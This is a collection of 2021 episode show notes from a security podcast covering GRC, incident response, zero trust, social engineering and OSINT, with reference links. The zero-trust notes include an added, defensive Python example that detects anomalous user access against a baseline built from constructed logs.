Infosec - vuln mgmt, compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breach exposure
How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
Step 0: everyone's input and use cases
Determine the total value gained by using a centralized GRC platform: missing data; duplicate processes; duplicate data; manual steps that can be removed or automated; workflows to assist heavily manual areas such as communications, emails, approvals, and reporting
Identify operational gaps to prioritize the areas you need to improve.
Get your team on board with an effectively communicated plan.
Build a strong foundation to support your GRC program.
Deploy a standardized GRC implementation across the board.
Let the GRC framework evolve and grow after it's implemented.

Sep 29, 2021 - 43 min

S2021 Ep 33: 2021-033-Kim_Crawley, 8 steps to better security - Part2

8 Steps to Better Security: A Simple Cyber Resilience Guide to Business has finished all final editing and will be published by @WileyTech on October 5th. Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.

Sponsored Link: https://amzn.to/3k3pDAN

Amazon teaser: "Harden your business against internal and external cybersecurity threats with a single accessible resource. In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps. Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
- Foster a strong security culture that extends from the custodial team to the C-suite
- Build an effective security team, regardless of the size or nature of your business
- Comply with regulatory requirements, including general data privacy rules and industry-specific legislation
- Test your cybersecurity, including third-party penetration testing and internal red team specialists
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries."

Sep 20, 2021 - 41 min

SPONSOR: Blumira's Patrick Garrity

Blumira, per Crunchbase: "Blumira's end-to-end platform offers both automated threat detection and response, enabling organizations of any size to more efficiently defend against cybersecurity threats in near real-time. It eases the burden of alert fatigue, complexity of log management and lack of IT visibility. Blumira's cloud SIEM can be deployed in hours with broad integration coverage across cloud, endpoint protection, firewall and identity providers including Office 365, G Suite, Crowdstrike, Okta, Palo Alto, Cisco FTD and many others."

Contact [email protected]

Patrick Garrity, VP of Operations. Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira's product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security. Twitter: @Thisisnottap

https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service
https://www.outsource2india.com/software/articles/software-as-a-service.asp

5 Advantages of SaaS:
- Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ...
- Lower costs. ...
- Scalability and integration. ...
- New releases (upgrades) ...
- Easy to use and perform proof-of-concepts.

5 Disadvantages of SaaS:
- Insufficient data security. SaaS-based application model.
- Difficulty with regulations compliance.
- Cumbersome data mobility.
- Low performance.
- Troublesome software integration.

Limit attack surface:
https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface
https://www.okta.com/identity-101/what-is-an-attack-surface/
https://securityscorecard.com/blog/what-is-cyber-attack-surface-management

Sep 16, 2021 - 48 min

S2021 Ep 32: 2021-032-Author_Kim_crawley-8-Simple_Rules_for_Cybersecurity


8 Steps to Better Security: A Simple Cyber Resilience Guide to Business has finished all final editing and will be published by @WileyTech on October 5th. It is available now via Kindle. Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.

Sponsored Link: https://amzn.to/3k3pDAN

Amazon teaser: "Harden your business against internal and external cybersecurity threats with a single accessible resource. In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps. Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
- Foster a strong security culture that extends from the custodial team to the C-suite
- Build an effective security team, regardless of the size or nature of your business
- Comply with regulatory requirements, including general data privacy rules and industry-specific legislation
- Test your cybersecurity, including third-party penetration testing and internal red team specialists
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries."

Sep 14, 2021 - 42 min

2021-031- back in the saddle, conference discussion, company privacy

"Beautiful country, but hotter than Satan's asshole"

https://www.theverge.com/22648265/apple-employee-privacy-icloud-id
https://mysudo.com/
https://arstechnica.com/information-technology/2021/09/npm-package-with-3-million-weekly-downloads-had-a-severe-vulnerability/
https://www.bleepingcomputer.com/news/security/bluetooth-braktooth-bugs-could-affect-billions-of-devices/
www.infoseccampout.com
www.log-md.com

@infosystir @bryanbrake @brakesec @hackershealth @boettcherpwned

Sep 3, 2021 - 1h 2m

S2021 Ep 30: 2021-030-incident response, business goal alignment, showing value in IR - p2


https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan

Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continues, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload?
- Testing of your IR costs money; do you have budget for that? (Verodin, red team)
- Restoring backups, extra VPC or Azure environment

Incidents occur. You have to minimize issues, right? But is there a good way of doing that?
- Simplify your environment?
- Spend time working on the CIS 20?
- You gotta plan for that and show value vs effort.

Incident response is an ever-changing landscape. What is the goal of IR?
- Minimize damage
- Identify affected systems
- Recover gracefully and quickly? Does your environment allow for quick recovery? What does 'return to normal' look like?

The goal of business: make money.
- Incidents should just be considered part of doing business (risks)
- The more popular, the more likely the attack
- Incident timeframe = criteria for getting back to normal.

PICERL is a cycle, and one of continual improvement. Incident response is not 'one and done'.

Aug 22, 2021 - 45 min

S2021 Ep 29: 2021-029-incident response, PICERL cycle, showing value in IR, aligning with business goals - p1


https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan

Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continues, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload?
- Testing of your IR costs money; do you have budget for that? (Verodin, red team)
- Restoring backups, extra VPC or Azure environment

Incidents occur. You have to minimize issues, right? But is there a good way of doing that?
- Simplify your environment?
- Spend time working on the CIS 20?
- You gotta plan for that and show value vs effort.

Incident response is an ever-changing landscape. What is the goal of IR?
- Minimize damage
- Identify affected systems
- Recover gracefully and quickly? Does your environment allow for quick recovery? What does 'return to normal' look like?

The goal of business: make money.
- Incidents should just be considered part of doing business (risks)
- The more popular, the more likely the attack
- Incident timeframe = criteria for getting back to normal.

PICERL is a cycle, and one of continual improvement. Incident response is not 'one and done'.

Aug 15, 2021 - 40 min

S2021 Ep 28: 2021-028-Rebekah Skeete - social engineering techniques and influences

BlackGirlsHack was created to share knowledge and resources to help black girls and women break through barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.

Rebekah Skeete, CyberBec: @rebekahskeete
Tennisha Martin: @misstennish
https://blackgirlshack.org/
https://www.twitter.com/blackgirlshack - Black Girls Hack
https://www.twitter.com/thefluffy007 - Jasmine Jackson

Background: https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ

Vegas conference - Blacks in Cyber Village:
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://www.marketwatch.com/story/retired-black-nfl-players-and-their-families-call-for-race-norming-practice-to-end-01621018741
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/

Social engineering topics:
Misophonia (or phonophobia): https://www.washingtonpost.com/national/health-science/misophonia-is-a-newly-identified-condition-for-people-hypersensitive-to-sound/2014/12/01/7c392782-69ba-11e4-a31c-77759fc1eacc_story.html
https://thecyberwire.com/podcasts/8th-layer-insights
https://terranovasecurity.com/examples-of-social-engineering-attacks/
How all either are directly influenced by.

News, and cool links to read:
https://chubk.com/youtuber-who-specializes-in-unmasking-scammers-ended-up-being-tricked-even-deleting-his-own-youtube-channel/ - LOL
SE write-up of a legitimate company (archive.org): https://web.archive.org/web/20190124114926/https://medium.com/@0xf3d/dissecting-arbitraging-co-in-depth-youve-been-scammed-again-21306de00fe5

Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM: https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Aug 8, 2021 - 53 min

S2021 Ep 27: 2021-027-Black Girls Hack COO Rebekah Skeete!


BlackGirlsHack was created to share knowledge and resources to help black girls and women break through barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.

Rebekah Skeete, CyberBec: @rebekahskeete
Tennisha Martin: @misstennish
https://blackgirlshack.org/
https://www.twitter.com/blackgirlshack - Black Girls Hack
https://www.twitter.com/thefluffy007 - Jasmine Jackson

Background: https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ

Vegas conference - Blacks in Cyber Village:
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://www.marketwatch.com/story/retired-black-nfl-players-and-their-families-call-for-race-norming-practice-to-end-01621018741
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/

Aug 2, 2021 - 1h 8m

S2021 Ep 26: 2021-026-Triaging threat research, Jira vulns, Serious Sam vuln, Systemd vulns, and HiveNightmare


https://www.mindtools.com/pages/article/newHTE_95.htm
https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/
https://www.productplan.com/glossary/action-priority-matrix/

More PrintNightmare issues: https://www.bleepingcomputer.com/news/microsoft/windows-10-july-security-updates-break-printing-on-some-systems/
"After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication," Microsoft explained.

https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
"Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim's machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021."

https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/
https://access.redhat.com/security/cve/cve-2021-33910
"It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash." There's no way to remedy this problem. While it's not present in all current Linux distros, you'll find it in most distros such as Debian 10 (Buster) and its relatives like Ubuntu and Mint. Therefore, you must, if you value keeping your computers working, patch your version of systemd as soon as possible. You'll be glad you did.

https://www.bleepingcomputer.com/news/security/atlassian-asks-customers-to-patch-critical-jira-vulnerability/
https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx
https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html
https://github.com/GossiTheDog/HiveNightmare

Jul 28, 2021 - 56 min

S2021 Ep 25: 2021-025-Dan Borges, Author of Adversarial Techniques from Packt Publishing

Dan Borges - Author, @1njection
Buy the book on Amazon: https://www.amazon.com/Adversarial-Tradecraft-Cybersecurity-real-time-computer-ebook-dp-B0957LV496/dp/B0957LV496?_encoding=UTF8&me=&qid=&linkCode=ll1&tag=bdspod-20&linkId=8f2daf0b3563cbbc2cee6a2d2138149d&language=en_US&ref_=as_li_ss_tl

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/amp/
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Www.Globalcptc.org
Virtual CCDC:

How easy was the process working with Packt? Did they approach you or vice versa?

5 D's of Physical Security: The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend. https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security

Jul 19, 2021 - 48 min

S2021 Ep 24: 2021-024-Dan Borges, Author of Adversarial Techniques from Packt Publishing


Dan Borges - Author, @1njection
Buy the book on Amazon: https://www.amazon.com/Adversarial-Tradecraft-Cybersecurity-real-time-computer-ebook-dp-B0957LV496/dp/B0957LV496?_encoding=UTF8&me=&qid=&linkCode=ll1&tag=bdspod-20&linkId=8f2daf0b3563cbbc2cee6a2d2138149d&language=en_US&ref_=as_li_ss_tl

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/amp/
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Www.Globalcptc.org
Virtual CCDC:

How easy was the process working with Packt? Did they approach you or vice versa?

5 D's of Physical Security: The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend. https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security

Jul 10, 2021 - 35 min

S2021 Ep 23: 2021-023-d3fend framework, DLL injection types, more solarwinds infections


Pihole setup
Conference talk

https://www.reuters.com/technology/microsoft-says-new-breach-discovered-probe-suspected-solarwinds-hackers-2021-06-25/
https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html
https://www.ehackingnews.com/2021/06/attackers-pummelled-gaming-industry.html
https://www.bleepingcomputer.com/news/microsoft/windows-11-wont-work-without-a-tpm-what-you-need-to-know/
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
https://d3fend.mitre.org/
https://www.theregister.com/2021/06/15/zoll_defibrillator_dashboard_vulnerabilities/
https://twitter.com/Hexacorn
https://www.ionos.com/digitalguide/server/configuration/winsxs-cleanup/
https://www.customink.com/fundraising/mental-health-hackers-7816

Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557

Jun 30, 2021 - 57 min

S2021 Ep 22: 2021-022-github policy updates targeting harmful software, Ms. Berlin discusses WWHF, CVSS discussion


Ms. Berlin's conference report: WWHF (Reno, NV). Her next appearances will be at Defcon 2021 and BlueTeam Con 2021!

https://www.infosecurity-magazine.com/news/amazon-prime-day-phishing-deluge/
https://www.ehackingnews.com/2021/06/threat-actors-use-google-drives-and.html
https://www.kennasecurity.com/blog/vulnerability-score-on-its-own-is-useless/
https://portswigger.net/daily-swig/nist-charts-course-towards-more-secure-supply-chains-for-government-software
https://github.blog/2021-04-29-call-for-feedback-policies-exploits-malware/
https://github.com/github/site-policy/pull/397
https://twitter.com/vm_call/status/1405937492642123782?s=20
https://thenewstack.io/cvss-struggles-to-remain-viable-in-the-era-of-cloud-native-computing/

ZOMG BUY SHIRTS HERE: https://www.customink.com/fundraising/mental-health-hackers-7816
Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557

Jun 22, 2021 - 48 min

S2021 Ep 21: 2021-021-Security Sphynx, ZeroTrust, implementation prep - part2


EO from President Biden asked for a plan to create a Zero Trust implementation in the next 90 days (well, 70ish days now… as of 23 May)
https://twitter.com/SecuritySphynx/status/1390475868032618496 @securitySphynx
"CIO: Zero Trust is the way…" What is the optimal configuration (read: easiest) zero trust config? Are there different ways to implement Zero Trust?

Links:
https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/
https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html
https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/
https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model
https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf

What is ZTA?
- Who are your users?
- What devices are in use? Device attestation/health checks
- What applications exist?
- What connections exist? Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows?
- Where is the data/traffic coming from? Going to?
- When is this activity occurring and what is expected?
- WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters. Mobile workforce - how much work can you get done without ever getting on the VPN?

Blockers
- Technical debt
- IT hygiene: Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality. Policy should exist to drive what the specifications of a baseline system, server, application, etc. will be. Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability. ZTA is less useful if you're not doing basic patching and application updates, and are allowing local admin at the system level.
- Legacy systems: Not designed with this approach in mind, and often costly to modernize.
- Asset management: Where are your assets and how are they used? A "rough estimate" of endpoints is never good enough. What are you logging? What AREN'T you logging?
- User rights auditing: Stale accounts, service accounts, HR workflows for onboarding/offboarding. Limitations of admin rights. Local admin/password expiration issues for sales/travelling employees.
- Human resources/talent
- Politics: Getting support/$$$/buy-in for retrofitting applications that are "working just fine" is a huge political/business hurdle.

Where to go from here:
- SaaS/PaaS/etc. offerings: What can you move from traditional on-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, offloading responsibility of maintenance, SSO capabilities)?
- AAA requirements: MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy.
- Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad-stroke permissions is always the right choice.
- Identify data owners, make them responsible for RBAC development with technical departments.
- Quantify risk associated with mishandled resources for crown jewels (see previous section on politics).
- Change control around permissions, access
- Security as an active participant in the development/acquisition of new products, software, services, or organizations. Like remodeling a house, it is much easier to build security into the process than hire someone to retrofit it later.
- What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM?
- Manage the endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional "control". Real-time, actionable data and capabilities are critical to remediation and progress. Asset inventory (again)... Then… HIDS/firewall, patch, AppLocker/application controls. Lather, rinse, repeat.
- DLP classification: It's hard, it's time-consuming, and it requires a LOT of support for business unit owners.
- Capture metrics, then set KPIs and regular check-ins to reduce MTTP/MTTR/MTTD

Would you like to know more? https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model

Jun 16, 2021 - 54 min

S2021 Ep 20: 2021-020: Security Sphynx, Preparing for ZeroTrust implementation - Part1


Full show notes are available here: https://docs.google.com/document/d/14dCpXeQ520IcZC3m007zVPhlIPXKgfv0LkqVnbDx0fc/edit?usp=sharing

The EO from President Biden (signed 12 May 2021) requires each agency to produce a plan to implement Zero Trust Architecture within 60 days of the order.
https://twitter.com/SecuritySphynx/status/1390475868032618496 @securitySphynx "CIO: Zero Trust is the way…"
What is the optimal (read: easiest) zero trust configuration? Are there different ways to implement Zero Trust?
https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/
https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html
https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/
https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model
https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf

What is ZTA?
- Who are your users?
- What: Devices in use? Device attestation/health checks. What applications exist? Not just into/out of the traditional LAN: do you understand the dependencies between applications and databases and how the traffic flows? What connections exist?
- Where is the data/traffic coming from? Going to?
- When is this activity occurring, and what is expected?
- Why: the need to balance access to technical resources in a rapidly evolving and dynamic business landscape that no longer stays within the confines of the traditional security perimeter. Mobile workforce: how much work can you get done without ever getting on the VPN?

Blockers
- Technical debt.
- IT hygiene: Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality. Policy should exist to drive what the specification of a baseline system, server, application, etc. will be: network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability. ZTA is less useful if you're not doing basic patching and application updates, or if you still allow local admin at the system level.
- Legacy systems: not designed with this approach in mind, and often costly to modernize.
- Asset management: where are your assets and how are they used? A "rough estimate" of endpoints is never good enough. What are you logging? What AREN'T you logging?
- Human resources/talent: stale accounts, service accounts, HR workflows for onboarding/offboarding; limitations on admin rights; local admin/password expiration issues for sales/travelling employees; user rights auditing.
- Politics: getting support/$$$/buy-in for retrofitting applications that are "working just fine" is a huge political/business hurdle.
- SaaS/PaaS/etc. offerings: what can you move from traditional on-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, maintenance responsibility offloaded, SSO capabilities)?

Where to go from here
- AAA requirements: MFA is a MUST. No, it's not perfect, but it is one more effective layer.
- Identify data owners and make them responsible for RBAC development together with the technical departments. Quantify the risk associated with mishandled crown-jewel resources (see the politics item above).
- Change control around permissions and access.
- Security as an active participant in the development/acquisition of new products, software, services, or organizations. Like remodeling a house, it is much easier to build security into the process than to hire someone to retrofit it later.
- Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad-stroke permissions is always the right choice.
- What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM?
- Asset inventory (again)... then HIDS/firewall, patching, AppLocker/application controls, DLP, classification. Lather, rinse, repeat. It's hard, it's time-consuming, and it requires a LOT of support from business unit owners.
- Capture metrics, then set KPIs and regular check-ins to reduce MTTP/MTTR/MTTD.
- Manage the endpoint: stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, and outside traditional "control". Real-time, actionable data and capabilities are critical to remediation and progress.

Would you like to know more? https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model

Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes
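The notes above keep returning to one prerequisite: you cannot detect abnormality without first establishing normality across who (users), what (devices, applications, connections), where (source network) and when. The following Python is an added example, not code from the podcast or from the Security Sphynx show notes. It builds a per-user baseline from a learning window of access events and then scores later events by how many of those dimensions fall outside the baseline. The JSON-lines log format, the field names (user, device, app, src_net, ts) and every event value are constructed for illustration; a real deployment would feed it identity-provider or access-proxy logs from a window you trust.

```python
"""Baseline-then-detect over access events (added example, not the podcast's code).

Learn "normal" per user from a trusted window, then score new events by how
many of who/what/where/when they violate. Log format and data are constructed.
"""
from collections import defaultdict
from datetime import datetime
import json

# Constructed learning-window events, one JSON object per line.
BASELINE_LOG = """\
{"user": "amanda", "device": "LT-0142", "app": "gitlab", "src_net": "corp-vpn", "ts": "2021-05-03T09:12:00"}
{"user": "amanda", "device": "LT-0142", "app": "jira", "src_net": "corp-vpn", "ts": "2021-05-03T10:40:00"}
{"user": "amanda", "device": "LT-0142", "app": "gitlab", "src_net": "home", "ts": "2021-05-04T14:05:00"}
{"user": "bryan", "device": "LT-0077", "app": "salesforce", "src_net": "corp-lan", "ts": "2021-05-03T08:30:00"}
{"user": "bryan", "device": "LT-0077", "app": "salesforce", "src_net": "corp-lan", "ts": "2021-05-05T17:55:00"}
{"user": "svc-backup", "device": "SRV-BKP01", "app": "s3-archive", "src_net": "dc-net", "ts": "2021-05-03T02:00:00"}
"""

# Constructed events to score: a normal one, an odd-hour one, a service account
# suddenly used from a laptop, and an identity the baseline has never seen.
NEW_EVENTS = """\
{"user": "amanda", "device": "LT-0142", "app": "gitlab", "src_net": "home", "ts": "2021-05-10T11:00:00"}
{"user": "bryan", "device": "LT-0077", "app": "salesforce", "src_net": "corp-lan", "ts": "2021-05-10T03:15:00"}
{"user": "svc-backup", "device": "LT-0142", "app": "gitlab", "src_net": "home", "ts": "2021-05-10T15:00:00"}
{"user": "mallory", "device": "LT-0142", "app": "gitlab", "src_net": "corp-vpn", "ts": "2021-05-10T12:00:00"}
"""

DIMENSIONS = ("device", "app", "src_net")          # the "what" and "where" fields
UNKNOWN_USER_SCORE = len(DIMENSIONS) + 2            # every dimension, the hour, and the identity itself


def parse_events(text):
    """Parse JSON lines; skip blank or malformed lines instead of aborting the run."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        ev["hour"] = datetime.fromisoformat(ev["ts"]).hour   # the "when" dimension
        events.append(ev)
    return events


def build_baseline(events):
    """Per user: the sets of devices, apps, source networks and hours seen in the window."""
    baseline = defaultdict(lambda: {d: set() for d in DIMENSIONS + ("hour",)})
    for ev in events:
        entry = baseline[ev["user"]]
        for d in DIMENSIONS:
            entry[d].add(ev[d])
        entry["hour"].add(ev["hour"])
    return dict(baseline)


def score_event(baseline, ev, hour_slack=2):
    """Return (score, reasons); a user absent from the baseline is fully anomalous."""
    entry = baseline.get(ev["user"])
    if entry is None:
        return UNKNOWN_USER_SCORE, ["user not in baseline"]
    reasons = [f"new {d}: {ev[d]}" for d in DIMENSIONS if ev[d] not in entry[d]]
    # An hour within +/- hour_slack of any baseline hour (wrapping past midnight) is normal.
    near_known_hour = any(
        min(abs(ev["hour"] - h), 24 - abs(ev["hour"] - h)) <= hour_slack for h in entry["hour"]
    )
    if not near_known_hour:
        reasons.append(f"unusual hour: {ev['hour']:02d}:00")
    return len(reasons), reasons


def detect(baseline_text, new_text, threshold=2):
    """Score each new event against the baseline; return (user, ts, score, reasons) at or above threshold."""
    baseline = build_baseline(parse_events(baseline_text))
    alerts = []
    for ev in parse_events(new_text):
        score, reasons = score_event(baseline, ev)
        if score >= threshold:
            alerts.append((ev["user"], ev["ts"], score, reasons))
    return alerts


if __name__ == "__main__":
    for user, ts, score, reasons in detect(BASELINE_LOG, NEW_EVENTS):
        print(f"{ts} {user} score={score} {'; '.join(reasons)}")
```

With the constructed data, the service account appearing on a laptop from a home network scores on every dimension and the unknown identity scores highest, while bryan's 03:15 login scores 1 (odd hour only) and stays below the default threshold; whether a lone off-hours event should page someone is exactly the tuning question the notes' "who is responsible for reviewing the logs" point leaves to the organization. The baseline must come from a window you trust: learn from a compromised period and the attacker's access becomes "normal".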

Jun 6, 2021 - 42 min

S2021 Ep 19 - 2021-019-Joe Gray, OSINT CTFs, gamifying and motivating to do the right thing

Part 2: CTF OSINT discussion
- How people will give additional information, even if they aren't receiving points for it.
- Gamifying and motivating people to 'do the right thing', like offering a chance to win a lottery for a COVID vaccine, free sports tickets for getting a shot, or gift cards for reporting phishes.
Joe Gray @C_3PJoe, The OSINTion https://theosintion.com
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
https://hunter.io/
https://halalgoogling.com/
The OSINTion Discord: https://discord.gg/p78TTGa
Stick/carrot interactions
https://www.aamc.org/news-insights/dollars-doughnuts-will-incentives-motivate-covid-19-vaccination
How do we motivate or create the desire?
Ohio COVID lottery: https://www.dispatch.com/story/news/2021/05/13/ohio-covid-vaccine-lottery-heres-how-you-can-win/5071370001/
Art sessions with Ms. Berlin

May 28, 2021 - 47 min

